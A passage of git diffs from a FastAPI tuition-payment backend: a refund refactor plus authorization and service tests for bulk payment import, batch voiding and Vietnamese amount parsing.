         refund.refund_reference = refund_reference
 
-        # Update invoice paid_amount (decrease). A full refund (paid back to 0)
-        # must return the invoice to 'issued', not leave it 'partial' with 0 paid
-        # (which would block re-collection — can_record_payment keys on 'issued').
-        invoice.paid_amount = invoice.paid_amount - refund.amount
-        if invoice.paid_amount <= 0:
-            invoice.paid_amount = Decimal("0")
-            invoice.status = InvoiceStatusEnum.issued.value
-            invoice.paid_at = None
-        elif invoice.paid_amount < invoice.amount:
-            invoice.status = InvoiceStatusEnum.partial.value
-            invoice.paid_at = None
-
-        # Update fee paid_amount (decrease)
-        fee.paid_amount = fee.paid_amount - refund.amount
-        fee.version += 1
-
-        # Update fee status
-        if fee.paid_amount < fee.final_amount - fee.waived_amount:
-            if fee.paid_amount > 0:
-                fee.status = FeeStatusEnum.partial.value
-            else:
-                fee.status = FeeStatusEnum.invoiced.value
+        # Rút tiền khỏi invoice + fee — 1 NGUỒN SỰ THẬT chung với void lô import
+        # (reverse_payment_balances). paid về 0 → invoice 'issued' (mở lại để thu),
+        # fee recompute status + bump version.
+        fee_balance_before, fee_balance_after = reverse_payment_balances(
+            invoice=invoice, fee=fee, amount=refund.amount
+        )
 
         # Create audit transaction
-        fee_balance_after = fee.final_amount - fee.paid_amount - fee.waived_amount
         transaction = PaymentTransaction(
             payment_id=payment.id,
             fee_id=fee.id,

--- a/Backend_FastAPI/tests/api/test_payment_import_authorization.py
+++ b/Backend_FastAPI/tests/api/test_payment_import_authorization.py
@@ -193,3 +193,101 @@ def test_casbin_migrations_seed_eft_v3():
         content = (versions / name).read_text(encoding="utf-8")
         assert "v2, v3, template_id" in content, f"{name} thiếu cột v3 (eft)"
         assert "'allow'" in content, f"{name} thiếu giá trị eft 'allow'"
+
+
+# Route mới BV-5 R2/R1: chi tiết lô (per-row) + tải file kết quả. Đường con
+# "/batches/{id}" → KHÔNG nuốt route danh sách "/batches".
+DETAIL_URL = "/api/payments/import/batches/999999"
+RESULT_URL = "/api/payments/import/batches/999999/result"
+
+
+class TestBatchDetailAndResultAuthz:
+    async def test_batches_list_still_200_not_shadowed(
+        self, client, accountant_token_headers
+    ):
+        # 🔴 P2 regression: detail "/batches/{id}" KHÔNG shadow list "/batches" → 200 (≠ 422).
+        r = await client.get(BATCHES_URL, headers=accountant_token_headers)
+        assert r.status_code == 200
+
+    async def test_detail_officer_denied(self, client, officer_token_headers):
+        r = await client.get(DETAIL_URL, headers=officer_token_headers)
+        assert r.status_code == 403
+
+    async def test_detail_regular_user_denied(
+        self, client, regular_user_token_headers
+    ):
+        r = await client.get(DETAIL_URL, headers=regular_user_token_headers)
+        assert r.status_code == 403
+
+    async def test_detail_accountant_passes_gate(
+        self, client, accountant_token_headers
+    ):
+        # Qua Casbin → lô không tồn tại → 404 (KHÔNG 403, KHÔNG 422 route-order).
+        r = await client.get(DETAIL_URL, headers=accountant_token_headers)
+        assert r.status_code == 404
+
+    async def test_detail_manager_passes_gate(self, client, manager_token_headers):
+        r = await client.get(DETAIL_URL, headers=manager_token_headers)
+        assert r.status_code == 404
+
+    async def test_result_officer_denied(self, client, officer_token_headers):
+        r = await client.get(RESULT_URL, headers=officer_token_headers)
+        assert r.status_code == 403
+
+    async def test_result_accountant_passes_gate(
+        self, client, accountant_token_headers
+    ):
+        r = await client.get(RESULT_URL, headers=accountant_token_headers)
+        assert r.status_code == 404
+
+
+class TestBatchDetailContent:
+    async def test_detail_returns_rows_no_missing_greenlet(
+        self, client, admin_token_headers
+    ):
+        # 🐞 Regression: serialize PaymentImportBatchDetailOut KHÔNG được đọc batch.rows
+        # (relationship lazy, chưa load) → MissingGreenlet → 500. Build từ summary.
+        from decimal import Decimal
+
+        from app.models.finance import PaymentImportBatch, PaymentImportRow
+
+        async with AsyncSessionLocal() as db:
+            batch = PaymentImportBatch(
+                academic_year=2026,
+                semester_no=1,
+                file_name="reg.xlsx",
+                file_sha256="sha-regression-detail-greenlet",
+                status="committed",
+                row_count=1,
+                matched_count=1,
+                warned_count=0,
+                failed_count=0,
+                total_amount=Decimal("1000000"),
+                created_by_id=None,
+            )
+            db.add(batch)
+            await db.flush()
+            db.add(
+                PaymentImportRow(
+                    batch_id=batch.id,
+                    row_no=2,
+                    citizen_id="001234567890",
+                    raw={"Số CCCD": "001234567890"},
+                    status="matched",
+                    amount=Decimal("1000000"),
+                    message="ok",
+                    payment_ids=[1],
+                )
+            )
+            await db.commit()
+            bid = batch.id
+
+        r = await client.get(
+            f"/api/payments/import/batches/{bid}", headers=admin_token_headers
+        )
+        assert r.status_code == 200, r.text
+        body = r.json()
+        assert body["id"] == bid
+        assert len(body["rows"]) == 1
+        assert body["rows"][0]["row_no"] == 2
+        assert body["rows"][0]["citizen_id"] == "001234567890"

--- a/Backend_FastAPI/tests/api/test_payment_import_authorization.py
+++ b/Backend_FastAPI/tests/api/test_payment_import_authorization.py
@@ -1,0 +1,127 @@
+"""API/Casbin authorization cho route import thu học phí hàng loạt (BV-2).
+
+Matrix (gate = CasbinAuth route-grant + require_finance_staff):
+* officer / user  → 403 (không có grant + không phải finance staff)
+* accountant / manager / admin → cho qua gate (template GET → 200; preview POST
+  với file rỗng → 400, chứng tỏ qua gate chứ không 403)
+
+Grant seed: dev-test auto-seed từ policy_templates.py (ACCOUNTANT/MANAGER template);
+prod seed qua migration bvg20260624001. admin có wildcard /* .*.
+"""
+
+from __future__ import annotations
+
+import pytest_asyncio
+
+from app import models
+from app.database import AsyncSessionLocal
+from app.main import fastapi_app
+from app.security import get_password_hash
+from tests.fixtures.constants import AuthURLs
+from tests.fixtures.users import create_user_with_role, get_auth_headers
+
+# asyncio_mode=auto (pytest.ini) tự nhận async test; KHÔNG đặt pytestmark asyncio
+# ở module (sẽ áp nhầm lên test sync test_migration_seeds_eft_v3 → warning).
+
+TEMPLATE_URL = "/api/payments/import/template"
+PREVIEW_URL = "/api/payments/import/preview"
+
+
+@pytest_asyncio.fixture
+async def accountant_token_headers(client) -> dict:
+    """Accountant user + auth headers (không có fixture sẵn trong conftest)."""
+    try:
+        from casbin_async_sqlalchemy_adapter import CasbinRule
+    except ImportError:  # pragma: no cover
+        CasbinRule = None
+    info = await create_user_with_role(
+        session_factory=AsyncSessionLocal,
+        user_data={
+            "username": "acct_import_test",
+            "email": "acct_import_test@test.com",
+            "password": "AcctPass123!",
+            "role": "accountant",
+            "status": "active",
+        },
+        casbin_role="role:accountant",
+        unit_id=None,
+        models=models,
+        get_password_hash=get_password_hash,
+        CasbinRule=CasbinRule,
+        app=fastapi_app,
+    )
+    return await get_auth_headers(client, info, AuthURLs.LOGIN)
+
+
+# ---------------------------------------------------------------------------
+# GET /import/template — CSRF-safe (GET), thuần Casbin
+# ---------------------------------------------------------------------------
+class TestTemplateAuthz:
+    async def test_officer_denied(self, client, officer_token_headers):
+        r = await client.get(TEMPLATE_URL, headers=officer_token_headers)
+        assert r.status_code == 403
+
+    async def test_regular_user_denied(self, client, regular_user_token_headers):
+        r = await client.get(TEMPLATE_URL, headers=regular_user_token_headers)
+        assert r.status_code == 403
+
+    async def test_accountant_allowed(self, client, accountant_token_headers):
+        r = await client.get(TEMPLATE_URL, headers=accountant_token_headers)
+        assert r.status_code == 200
+        assert "spreadsheet" in r.headers.get("content-type", "")
+
+    async def test_manager_allowed(self, client, manager_token_headers):
+        r = await client.get(TEMPLATE_URL, headers=manager_token_headers)
+        assert r.status_code == 200
+
+    async def test_admin_allowed(self, client, admin_token_headers):
+        # admin qua wildcard /* .*
+        r = await client.get(TEMPLATE_URL, headers=admin_token_headers)
+        assert r.status_code == 200
+
+
+# ---------------------------------------------------------------------------
+# POST /import/preview — CSRF skip trong test env; gate chặn TRƯỚC body
+# ---------------------------------------------------------------------------
+class TestPreviewAuthz:
+    async def test_officer_denied(self, client, officer_token_headers):
+        # Gate (dependency) chặn trước khi đọc body → 403 dù có gửi file.
+        r = await client.post(
+            PREVIEW_URL,
+            data={"academic_year": "2026", "semester_no": "1"},
+            files={"file": ("t.csv", b"x", "text/csv")},
+            headers=officer_token_headers,
+        )
+        assert r.status_code == 403
+
+    async def test_accountant_passes_gate(self, client, accountant_token_headers):
+        # Accountant qua gate → KHÔNG 403. File rỗng → 400 (chứng tỏ body chạy).
+        r = await client.post(
+            PREVIEW_URL,
+            data={"academic_year": "2026", "semester_no": "1"},
+            files={"file": ("t.csv", b"", "text/csv")},
+            headers=accountant_token_headers,
+        )
+        assert r.status_code != 403  # qua gate (authz pass)
+        assert r.status_code in (400, 422)  # file rỗng → lỗi validate, KHÔNG 403
+
+
+def test_migration_seeds_eft_v3():
+    """Regression guard (bug qae2e02): migration casbin_rule p-row PHẢI ghi v3 (eft).
+
+    auth_model.conf ``p = sub, obj, act, eft`` → row p thiếu v3 bị bỏ khi
+    load_policy() / "invalid policy size" → grant vô hiệu trên prod. Test thường
+    dùng template-seed (apply_template tự thêm eft) nên KHÔNG bắt được lỗi migration
+    → phải kiểm TĨNH nội dung file migration.
+    """
+    import pathlib
+
+    mig = (
+        pathlib.Path(__file__).resolve().parents[2]
+        / "alembic"
+        / "versions"
+        / "bvg20260624001_casbin_payment_import_grants.py"
+    )
+    content = mig.read_text(encoding="utf-8")
+    assert "v2, v3, template_id" in content  # INSERT có cột v3 (eft)
+    assert "'allow'" in content  # giá trị eft

--- a/Backend_FastAPI/tests/api/test_payment_import_authorization.py
+++ b/Backend_FastAPI/tests/api/test_payment_import_authorization.py
@@ -26,6 +26,7 @@ from tests.fixtures.users import create_user_with_role, get_auth_headers
 TEMPLATE_URL = "/api/payments/import/template"
 PREVIEW_URL = "/api/payments/import/preview"
 COMMIT_URL = "/api/payments/import/{}/commit"
+VOID_URL = "/api/payments/import/{}/void"
 BATCHES_URL = "/api/payments/import/batches"
 
 
@@ -138,6 +139,41 @@ class TestBatchesAuthz:
         assert r.status_code == 200
 
 
+# ---------------------------------------------------------------------------
+# POST /import/{id}/void (đảo lô) — BV-3.5: manager/admin ONLY (accountant DENY)
+# ---------------------------------------------------------------------------
+class TestVoidAuthz:
+    _BODY = {"reason": "đảo lô do nhập sai"}
+
+    async def test_officer_denied(self, client, officer_token_headers):
+        r = await client.post(
+            VOID_URL.format(999999), json=self._BODY, headers=officer_token_headers
+        )
+        assert r.status_code == 403
+
+    async def test_accountant_denied(self, client, accountant_token_headers):
+        # KHÁC commit/batches: accountant là finance staff NHƯNG void = manager/admin
+        # → accountant PHẢI bị từ chối (Casbin không grant + require_admin_or_manager).
+        r = await client.post(
+            VOID_URL.format(999999), json=self._BODY, headers=accountant_token_headers
+        )
+        assert r.status_code == 403
+
+    async def test_manager_passes_gate(self, client, manager_token_headers):
+        r = await client.post(
+            VOID_URL.format(999999), json=self._BODY, headers=manager_token_headers
+        )
+        assert r.status_code != 403  # qua gate
+        assert r.status_code == 404  # lô không tồn tại
+
+    async def test_admin_passes_gate(self, client, admin_token_headers):
+        r = await client.post(
+            VOID_URL.format(999999), json=self._BODY, headers=admin_token_headers
+        )
+        assert r.status_code != 403
+        assert r.status_code == 404
+
+
 def test_casbin_migrations_seed_eft_v3():
     """Regression guard (qae2e02): migration casbin_rule p-row PHẢI có v3 (eft).
 
@@ -152,6 +188,7 @@ def test_casbin_migrations_seed_eft_v3():
     for name in (
         "bvg20260624001_casbin_payment_import_grants.py",
         "bvh20260624001_casbin_payment_import_commit_grants.py",
+        "bvj20260625001_casbin_payment_import_void_grant.py",
     ):
         content = (versions / name).read_text(encoding="utf-8")
         assert "v2, v3, template_id" in content, f"{name} thiếu cột v3 (eft)"

--- a/Backend_FastAPI/tests/api/test_payment_import_authorization.py
+++ b/Backend_FastAPI/tests/api/test_payment_import_authorization.py
@@ -25,6 +25,8 @@ from tests.fixtures.users import create_user_with_role, get_auth_headers
 
 TEMPLATE_URL = "/api/payments/import/template"
 PREVIEW_URL = "/api/payments/import/preview"
+COMMIT_URL = "/api/payments/import/{}/commit"
+BATCHES_URL = "/api/payments/import/batches"
 
 
 @pytest_asyncio.fixture
@@ -106,8 +108,38 @@ class TestPreviewAuthz:
         assert r.status_code in (400, 422)  # file rỗng → lỗi validate, KHÔNG 403
 
 
-def test_migration_seeds_eft_v3():
-    """Regression guard (bug qae2e02): migration casbin_rule p-row PHẢI ghi v3 (eft).
+# ---------------------------------------------------------------------------
+# POST /import/{id}/commit (ghi tiền) — BV-3 dual-gate
+# ---------------------------------------------------------------------------
+class TestCommitAuthz:
+    async def test_officer_denied(self, client, officer_token_headers):
+        r = await client.post(COMMIT_URL.format(999999), headers=officer_token_headers)
+        assert r.status_code == 403
+
+    async def test_accountant_passes_gate(self, client, accountant_token_headers):
+        # qua gate → commit lô không tồn tại → 404 (KHÔNG 403)
+        r = await client.post(
+            COMMIT_URL.format(999999), headers=accountant_token_headers
+        )
+        assert r.status_code != 403
+        assert r.status_code == 404
+
+
+# ---------------------------------------------------------------------------
+# GET /import/batches (lịch sử) — BV-3 dual-gate
+# ---------------------------------------------------------------------------
+class TestBatchesAuthz:
+    async def test_officer_denied(self, client, officer_token_headers):
+        r = await client.get(BATCHES_URL, headers=officer_token_headers)
+        assert r.status_code == 403
+
+    async def test_accountant_allowed(self, client, accountant_token_headers):
+        r = await client.get(BATCHES_URL, headers=accountant_token_headers)
+        assert r.status_code == 200
+
+
+def test_casbin_migrations_seed_eft_v3():
+    """Regression guard (qae2e02): migration casbin_rule p-row PHẢI có v3 (eft).
 
     auth_model.conf ``p = sub, obj, act, eft`` → row p thiếu v3 bị bỏ khi
     load_policy() / "invalid policy size" → grant vô hiệu trên prod. Test thường
@@ -116,12 +148,11 @@ def test_migration_seeds_eft_v3():
     """
     import pathlib
 
-    mig = (
-        pathlib.Path(__file__).resolve().parents[2]
-        / "alembic"
-        / "versions"
-        / "bvg20260624001_casbin_payment_import_grants.py"
-    )
-    content = mig.read_text(encoding="utf-8")
-    assert "v2, v3, template_id" in content  # INSERT có cột v3 (eft)
-    assert "'allow'" in content  # giá trị eft
+    versions = pathlib.Path(__file__).resolve().parents[2] / "alembic" / "versions"
+    for name in (
+        "bvg20260624001_casbin_payment_import_grants.py",
+        "bvh20260624001_casbin_payment_import_commit_grants.py",
+    ):
+        content = (versions / name).read_text(encoding="utf-8")
+        assert "v2, v3, template_id" in content, f"{name} thiếu cột v3 (eft)"
+        assert "'allow'" in content, f"{name} thiếu giá trị eft 'allow'"

--- a/Backend_FastAPI/tests/api/test_payment_import_authorization.py
+++ b/Backend_FastAPI/tests/api/test_payment_import_authorization.py
@@ -189,6 +189,7 @@ def test_casbin_migrations_seed_eft_v3():
         "bvg20260624001_casbin_payment_import_grants.py",
         "bvh20260624001_casbin_payment_import_commit_grants.py",
         "bvj20260625001_casbin_payment_import_void_grant.py",
+        "bvk20260626001_casbin_payment_import_read_grants.py",
     ):
         content = (versions / name).read_text(encoding="utf-8")
         assert "v2, v3, template_id" in content, f"{name} thiếu cột v3 (eft)"

--- a/Backend_FastAPI/tests/services/test_payment_import_service.py
+++ b/Backend_FastAPI/tests/services/test_payment_import_service.py
@@ -1431,6 +1431,291 @@ class TestCommitBatch:
         assert pay.reference_code == "-PT-2026-001"  # KHÔNG có dấu ' đầu
 
 
+class TestVoidBatch:
+    async def _commit_one(self, db, deps, importer_id):
+        await _seed_system_user(db)
+        await _seed_cash_method(db)
+        batch = await _preview_batch(db, deps, importer_id=importer_id)
+        batch_id = batch.id
+        await db.commit()
+        await pis.commit_batch(
+            db, batch_id=batch_id, importer_id=importer_id, unit_id=None
+        )
+        await db.commit()
+        return batch_id
+
+    async def test_void_reverses_payment(self, db, seeded_dependencies, admin_user):
+        # §10 Void: đảo lô → trừ lại paid_amount, reverse transaction, recompute status
+        batch_id = await self._commit_one(db, seeded_dependencies, admin_user.id)
+        result, _cb = await pis.void_batch(
+            db, batch_id=batch_id, user_id=admin_user.id, unit_id=None,
+            reason="nhập sai hồ sơ",
+        )
+        await db.commit()
+
+        assert result.reversed_count == 1
+        assert result.reversed_amount == Decimal("10000000")
+        b = (
+            await db.execute(
+                select(PaymentImportBatch).where(PaymentImportBatch.id == batch_id)
+            )
+        ).scalar_one()
+        assert b.status == "void" and b.voided_at is not None
+        assert b.void_reason == "nhập sai hồ sơ"
+
+        pay = (await db.execute(select(Payment))).scalars().first()
+        assert pay.status == "refunded"  # rút lại → loại khỏi sum verified
+        inv = (await db.execute(select(Invoice))).scalars().first()
+        assert inv.paid_amount == Decimal("0")
+        assert inv.status == "issued"  # mở lại để thu tiếp
+        fee = (
+            (await db.execute(select(Fee).where(Fee.fee_type == "tuition")))
+            .scalars()
+            .first()
+        )
+        assert fee.paid_amount == Decimal("0")
+        assert fee.status == "invoiced"
+
+        rev = (
+            (
+                await db.execute(
+                    select(PaymentTransaction).where(
+                        PaymentTransaction.transaction_type == "reversal"
+                    )
+                )
+            )
+            .scalars()
+            .first()
+        )
+        assert rev is not None
+        assert rev.amount == Decimal("-10000000")  # âm
+        assert rev.idempotency_key == f"bulkvoid:{batch_id}:{pay.id}"
+
+    async def test_void_only_committed_batch(
+        self, db, seeded_dependencies, admin_user
+    ):
+        # Lô 'preview' (chưa commit) → KHÔNG void được
+        await _seed_system_user(db)
+        await _seed_cash_method(db)
+        batch = await _preview_batch(
+            db, seeded_dependencies, importer_id=admin_user.id
+        )
+        batch_id = batch.id
+        await db.commit()
+        with pytest.raises(ConflictError):
+            await pis.void_batch(
+                db, batch_id=batch_id, user_id=admin_user.id, unit_id=None, reason="x"
+            )
+
+    async def test_revoid_rejected(self, db, seeded_dependencies, admin_user):
+        # void 2 lần → lần 2 ConflictError (status=void ≠ committed)
+        batch_id = await self._commit_one(db, seeded_dependencies, admin_user.id)
+        await pis.void_batch(
+            db, batch_id=batch_id, user_id=admin_user.id, unit_id=None, reason="x"
+        )
+        await db.commit()
+        with pytest.raises(ConflictError):
+            await pis.void_batch(
+                db, batch_id=batch_id, user_id=admin_user.id, unit_id=None, reason="x"
+            )
+
+    async def test_void_frees_file_for_reimport(
+        self, db, seeded_dependencies, admin_user
+    ):
+        # Sau void, file_sha256 thoát partial-unique → re-import tạo batch MỚI
+        await _seed_system_user(db)
+        await _seed_cash_method(db)
+        cid = "001234567890"
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id=cid,
+            invoices=[(1, "10000000", "issued", "0", "0")],
+        )
+        content = _csv_bytes(
+            [
+                pis.TEMPLATE_COLS,
+                [cid, "Nguyễn Văn An", "10.000.000", "05/09/2026", "TM", "", ""],
+            ]
+        )
+        b1, _ = await pis.preview_import(
+            db, content=content, filename="thu.csv", academic_year=2026,
+            semester_no=1, created_by_id=admin_user.id, unit_id=None,
+        )
+        b1_id = b1.id
+        await db.commit()
+        await pis.commit_batch(
+            db, batch_id=b1_id, importer_id=admin_user.id, unit_id=None
+        )
+        await db.commit()
+        await pis.void_batch(
+            db, batch_id=b1_id, user_id=admin_user.id, unit_id=None, reason="x"
+        )
+        await db.commit()
+        # re-import cùng file → KHÔNG ConflictError (batch cũ đã void) → batch mới
+        b2, _ = await pis.preview_import(
+            db, content=content, filename="thu.csv", academic_year=2026,
+            semester_no=1, created_by_id=admin_user.id, unit_id=None,
+        )
+        await db.commit()
+        assert b2.id != b1_id
+
+    async def test_void_cross_unit_rejected(
+        self, db, seeded_dependencies, second_unit, officer_user, admin_user
+    ):
+        # manager đơn vị khác void lô đơn vị 1001 → 404 (không poison)
+        await _seed_system_user(db)
+        await _seed_cash_method(db)
+        batch = await _preview_batch(
+            db, seeded_dependencies, importer_id=officer_user.id
+        )  # creator unit 1001
+        batch_id = batch.id
+        await db.commit()
+        await pis.commit_batch(
+            db, batch_id=batch_id, importer_id=admin_user.id, unit_id=None
+        )
+        await db.commit()
+        with pytest.raises(ResourceNotFoundError):
+            await pis.void_batch(
+                db, batch_id=batch_id, user_id=admin_user.id,
+                unit_id=second_unit.id, reason="x",
+            )
+        b = (
+            await db.execute(
+                select(PaymentImportBatch).where(PaymentImportBatch.id == batch_id)
+            )
+        ).scalar_one()
+        assert b.status == "committed"  # không bị void nhầm
+
+    async def test_void_partial_paid_invoice(
+        self, db, seeded_dependencies, admin_user
+    ):
+        # #9: nhánh 'partial' của reverse — invoice còn paid khác sau khi đảo bulk
+        await _seed_system_user(db)
+        await _seed_cash_method(db)
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="001234567890",
+            invoices=[(1, "10000000", "partial", "4000000", "0")],  # đã trả 4tr trước
+        )
+        content = _csv_bytes(
+            [
+                pis.TEMPLATE_COLS,
+                ["001234567890", "Nguyễn Văn An", "6.000.000", "05/09/2026", "TM",
+                 "", ""],
+            ]
+        )
+        batch, _ = await pis.preview_import(
+            db, content=content, filename="thu.csv", academic_year=2026,
+            semester_no=1, created_by_id=admin_user.id, unit_id=None,
+        )
+        bid = batch.id
+        await db.commit()
+        await pis.commit_batch(
+            db, batch_id=bid, importer_id=admin_user.id, unit_id=None
+        )
+        await db.commit()  # invoice paid = 10tr (paid)
+        await pis.void_batch(
+            db, batch_id=bid, user_id=admin_user.id, unit_id=None, reason="x"
+        )
+        await db.commit()
+        inv = (await db.execute(select(Invoice))).scalars().first()
+        assert inv.paid_amount == Decimal("4000000")  # còn 4tr (paid trước, KHÔNG đảo)
+        assert inv.status == "partial"  # nhánh partial, KHÔNG về issued
+
+    async def test_void_multi_invoice(self, db, seeded_dependencies, admin_user):
+        # #10: 1 dòng trải 2 đợt → 2 payment → void đảo cả 2 (cumulative trên 1 fee)
+        await _seed_system_user(db)
+        await _seed_cash_method(db)
+        batch = await _preview_batch(
+            db, seeded_dependencies, importer_id=admin_user.id, amount="7.000.000",
+            invoices=(
+                (1, "4000000", "issued", "0", "0"),
+                (2, "6000000", "issued", "0", "0"),
+            ),
+        )
+        bid = batch.id
+        await db.commit()
+        await pis.commit_batch(
+            db, batch_id=bid, importer_id=admin_user.id, unit_id=None
+        )
+        await db.commit()
+        result, _ = await pis.void_batch(
+            db, batch_id=bid, user_id=admin_user.id, unit_id=None, reason="x"
+        )
+        await db.commit()
+        assert result.reversed_count == 2
+        assert result.reversed_amount == Decimal("7000000")
+        invs = (
+            (await db.execute(select(Invoice).order_by(Invoice.installment_no)))
+            .scalars()
+            .all()
+        )
+        assert all(i.paid_amount == Decimal("0") and i.status == "issued" for i in invs)
+        fee = (
+            (await db.execute(select(Fee).where(Fee.fee_type == "tuition")))
+            .scalars()
+            .first()
+        )
+        assert fee.paid_amount == Decimal("0") and fee.status == "invoiced"
+        revs = (
+            (
+                await db.execute(
+                    select(PaymentTransaction).where(
+                        PaymentTransaction.transaction_type == "reversal"
+                    )
+                )
+            )
+            .scalars()
+            .all()
+        )
+        assert len(revs) == 2
+
+    async def test_void_blocked_when_refund_exists(
+        self, db, seeded_dependencies, admin_user
+    ):
+        # P1: payment có RefundRequest non-rejected → void REFUSE (chống double-reverse)
+        from app.models.finance import RefundRequest
+
+        batch_id = await self._commit_one(db, seeded_dependencies, admin_user.id)
+        pay = (await db.execute(select(Payment))).scalars().first()
+        db.add(
+            RefundRequest(
+                payment_id=pay.id, amount=Decimal("5000000"), reason="khách đòi lại",
+                requested_by_id=admin_user.id, status="approved",
+            )
+        )
+        await db.commit()
+        with pytest.raises(ConflictError):
+            await pis.void_batch(
+                db, batch_id=batch_id, user_id=admin_user.id, unit_id=None, reason="x"
+            )
+        b = (
+            await db.execute(
+                select(PaymentImportBatch).where(PaymentImportBatch.id == batch_id)
+            )
+        ).scalar_one()
+        assert b.status == "committed"  # KHÔNG bị void
+
+    async def test_void_blocked_when_fee_cancelled(
+        self, db, seeded_dependencies, admin_user
+    ):
+        # #3: fee bị hủy out-of-band giữa commit→void → refuse (không resurrect)
+        batch_id = await self._commit_one(db, seeded_dependencies, admin_user.id)
+        fee = (
+            (await db.execute(select(Fee).where(Fee.fee_type == "tuition")))
+            .scalars()
+            .first()
+        )
+        fee.status = "cancelled"
+        await db.commit()
+        with pytest.raises(BusinessRuleViolation):
+            await pis.void_batch(
+                db, batch_id=batch_id, user_id=admin_user.id, unit_id=None, reason="x"
+            )
+
+
 class TestListBatches:
     async def test_unit_scope(self, db, seeded_dependencies, second_unit, officer_user):
         # P1 #2: list lô unit-scope theo đơn vị người tạo.

--- a/Backend_FastAPI/tests/services/test_payment_import_service.py
+++ b/Backend_FastAPI/tests/services/test_payment_import_service.py
@@ -207,8 +207,16 @@ class TestParseAmount:
         assert pis.parse_amount_vn("1,234,567.50") == Decimal("1234567.50")
 
     def test_single_comma_still_vn_decimal(self):
-        # Không regress: 1 dấu ',' giữ nghĩa thập phân VN
+        # Không regress: 1 dấu ',' + 1-2 chữ số giữ nghĩa thập phân VN
         assert pis.parse_amount_vn("7,50") == Decimal("7.50")
+        assert pis.parse_amount_vn("7,5") == Decimal("7.5")
+
+    def test_single_comma_three_digits_is_thousands(self):
+        # P1: ',' đơn + ĐÚNG 3 chữ số = phân cách nghìn (VND nguyên), KHÔNG thập phân.
+        # Trước đây '500,000' -> 500.000 -> 500.00 = GHI NHẦM 500đ thay vì 500.000đ.
+        assert pis.parse_amount_vn("500,000") == Decimal("500000")
+        assert pis.parse_amount_vn("7,500") == Decimal("7500")
+        assert pis.parse_amount_vn("1,200") == Decimal("1200")
 
     def test_malformed_groups_rejected(self):
         # Fix #9: nhóm nghìn sai (nhóm giữa ≠3) KHÔNG được nối thầm thành số

--- a/Backend_FastAPI/tests/services/test_payment_import_service.py
+++ b/Backend_FastAPI/tests/services/test_payment_import_service.py
@@ -1383,6 +1383,49 @@ class TestCommitBatch:
         ).scalar_one()
         assert b.status == "committed"
 
+    async def test_unexpected_error_shows_generic_message(
+        self, db, seeded_dependencies, admin_user, monkeypatch
+    ):
+        # Lỗi KHÔNG lường khi ghi 1 dòng (vd asyncpg/IntegrityError) → message generic
+        # thân thiện + KHÔNG dump SQLAlchemy/asyncpg cho kế toán; savepoint cô lập dòng.
+        await _seed_system_user(db)
+        await _seed_cash_method(db)
+        batch = await _preview_batch(db, seeded_dependencies, importer_id=admin_user.id)
+        batch_id = batch.id
+        await db.commit()
+
+        async def _boom(*args, **kwargs):
+            raise RuntimeError("asyncpg.ForeignKeyViolationError: detail")
+
+        monkeypatch.setattr(pis, "auto_verify_payment", _boom)
+
+        result, _ = await pis.commit_batch(
+            db, batch_id=batch_id, importer_id=admin_user.id, unit_id=None
+        )
+        await db.commit()
+
+        assert result.committed_count == 0
+        assert result.failed_count == 1
+        row = (
+            await db.execute(
+                select(PaymentImportRow).where(PaymentImportRow.batch_id == batch_id)
+            )
+        ).scalar_one()
+        assert row.status == "error"
+        assert row.message == (
+            "lỗi hệ thống khi ghi dòng này — vui lòng liên hệ kỹ thuật"
+        )
+        # KHÔNG lộ chi tiết kỹ thuật cho kế toán
+        assert "asyncpg" not in row.message
+        assert "ForeignKeyViolation" not in row.message
+        # lô fail-toàn-bộ → giữ 'preview' (re-import được, không poison)
+        b = (
+            await db.execute(
+                select(PaymentImportBatch).where(PaymentImportBatch.id == batch_id)
+            )
+        ).scalar_one()
+        assert b.status == "preview"
+
     async def test_cross_unit_creator_rejected(
         self, db, seeded_dependencies, second_unit, officer_user, admin_user
     ):
@@ -1866,7 +1909,8 @@ async def _mk_user(db, *, username, unit_id, role="accountant"):
 
 
 async def _mk_batch_with_row(
-    db, *, creator_id, status, raw, row_status="matched", payment_ids=None, amount="1000000"
+    db, *, creator_id, status, raw, row_status="matched", payment_ids=None,
+    amount="1000000", resolved_profile_id=None,
 ):
     batch = PaymentImportBatch(
         academic_year=2026,
@@ -1892,6 +1936,7 @@ async def _mk_batch_with_row(
         amount=Decimal(amount),
         message="",
         payment_ids=payment_ids or [],
+        resolved_profile_id=resolved_profile_id,
     )
     db.add(row)
     await db.flush()
@@ -2015,3 +2060,47 @@ class TestResultFileAndDetail:
         content, _, _ = await pis.build_result_file(db, batch.id, "csv", None)
         text = content.decode("utf-8")
         assert "Lỗi (không ghi)" in text
+
+    async def test_includes_profile_name_column_after_student_name(
+        self, db, seeded_dependencies, admin_user
+    ):
+        # Cột "Tên hồ sơ" (tên hệ thống) chèn NGAY SAU "Họ và tên học sinh" để đối chiếu.
+        profile, _, _ = await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="012345678901",
+            invoices=[(1, 1000000, "issued", 0, 0)],
+            lead_name="Nguyễn Thị Hồng",
+        )
+        batch = await _mk_batch_with_row(
+            db,
+            creator_id=admin_user.id,
+            status="committed",
+            raw={pis.COL_CCCD: "012345678901", pis.COL_NAME: "Nguyen Thi Hong"},
+            payment_ids=[101],
+            resolved_profile_id=profile.id,
+        )
+        content, _, _ = await pis.build_result_file(db, batch.id, "csv", None)
+        text = content.decode("utf-8")
+        header = text.splitlines()[0].lstrip("﻿").split(",")
+        assert pis.COL_PROFILE_NAME in header
+        assert header.index(pis.COL_PROFILE_NAME) == header.index(pis.COL_NAME) + 1
+        # tên hệ thống (có dấu) xuất hiện — khác tên file ghi không dấu
+        assert "Nguyễn Thị Hồng" in text
+
+    async def test_profile_name_placeholder_when_unresolved(
+        self, db, seeded_dependencies, admin_user
+    ):
+        # Dòng không resolve được hồ sơ → cột "Tên hồ sơ" = "(không có hồ sơ)".
+        batch = await _mk_batch_with_row(
+            db,
+            creator_id=admin_user.id,
+            status="preview",
+            raw={pis.COL_CCCD: "999999999999", pis.COL_NAME: "Vô Danh"},
+            row_status="error",
+            payment_ids=[],
+            resolved_profile_id=None,
+        )
+        content, _, _ = await pis.build_result_file(db, batch.id, "csv", None)
+        text = content.decode("utf-8")
+        assert "(không có hồ sơ)" in text

--- a/Backend_FastAPI/tests/services/test_payment_import_service.py
+++ b/Backend_FastAPI/tests/services/test_payment_import_service.py
@@ -746,7 +746,7 @@ class TestResolveValidate:
             db, [_draft("001234567890", "1000000")], 2026, 2, None
         )  # hỏi HK2
